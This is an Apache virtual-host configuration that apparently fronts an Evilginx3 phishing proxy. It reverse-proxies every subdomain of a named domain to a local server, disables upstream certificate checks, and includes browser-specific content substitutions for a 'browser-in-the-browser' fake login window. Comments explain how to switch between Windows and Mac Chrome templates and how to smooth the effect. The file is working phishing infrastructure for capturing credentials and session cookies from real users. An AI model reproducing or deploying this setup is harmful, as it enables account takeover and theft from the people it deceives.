
# LOCATION: /etc/apache2/sites-available/000-default.conf

Define certsPathDir /etc/ssl/localcerts/
Define domain etech-it.com.au


<VirtualHost *:443>
    ServerName subdomains.${domain}
    ServerAlias *.${domain}
    SSLEngine on
    SSLProxyEngine On
    SSLProxyVerify none
    SSLProxyCheckPeerCN off
    SSLProxyCheckPeerName off
    SSLProxyCheckPeerExpire off
    SSLCertificateFile ${certsPathDir}${domain}/fullchain.pem
    SSLCertificateKeyFile ${certsPathDir}${domain}/privkey.pem
    ProxyPreserveHost On



    Alias /primary /var/www/primary
    <Directory /var/www/primary>
        Options Indexes FollowSymLinks
        AllowOverride None
        Require all granted
    </Directory>

    ProxyPass /primary !


    Alias /secondary /var/www/secondary
    <Directory /var/www/secondary>
        Options Indexes FollowSymLinks
        AllowOverride None
        Require all granted
    </Directory>

    ProxyPass /secondary !

    ProxyPass / https://127.0.0.1:8443/
    ProxyPassReverse / https://127.0.0.1:8443/
    

    # Enable output buffering and content substitution
    SetOutputFilter INFLATE;SUBSTITUTE;DEFLATE


    # Substitutions (excluding /primary, /secondary, and /)
    <LocationMatch "^/(?!secondary|primary|($|\?))">
    # Uncomment the one you want and remeber to restart apache after any changes:
            #  Include /etc/apache2/custom-subs/win-chrome.conf
             Include /etc/apache2/custom-subs/mac-chrome.conf
    </LocationMatch>

    # Substitutions only for base URL, only apply subs on /?auth=2
    <LocationMatch "^/$">
        <If "%{QUERY_STRING} =~ /auth=2/">
        # Uncomment the one you want and remeber to restart apache after any changes:
            #  Include /etc/apache2/custom-subs/win-chrome.conf
             Include /etc/apache2/custom-subs/mac-chrome.conf
        </If>
    </LocationMatch>

    # Caching behavior (helps make the BITB effect way smoother between redirects)
    <IfModule mod_headers.c>
        <FilesMatch ".+">
            Header set Cache-Control "max-age=3600, public"
        </FilesMatch>
    </IfModule>



    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access_evilginx3.log "%h \"%r\" \"%{Referer}i\" \"%{User-Agent}i\""

</VirtualHost>



# Handle Base Domain separately
<VirtualHost *:443>
	ServerName ${domain}
    SSLEngine on
    SSLProxyEngine On
    SSLProxyVerify none
    SSLProxyCheckPeerCN off
    SSLProxyCheckPeerName off
    SSLProxyCheckPeerExpire off
    SSLCertificateFile ${certsPathDir}${domain}/fullchain.pem
    SSLCertificateKeyFile ${certsPathDir}${domain}/privkey.pem
    ProxyPreserveHost On

    DocumentRoot /var/www/home
    
    <Directory /var/www/home>
        Options Indexes FollowSymLinks
        AllowOverride None
        Require all granted
    </Directory>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access_evilginx3.log "%h \"%r\" \"%{Referer}i\" \"%{User-Agent}i\""

</VirtualHost>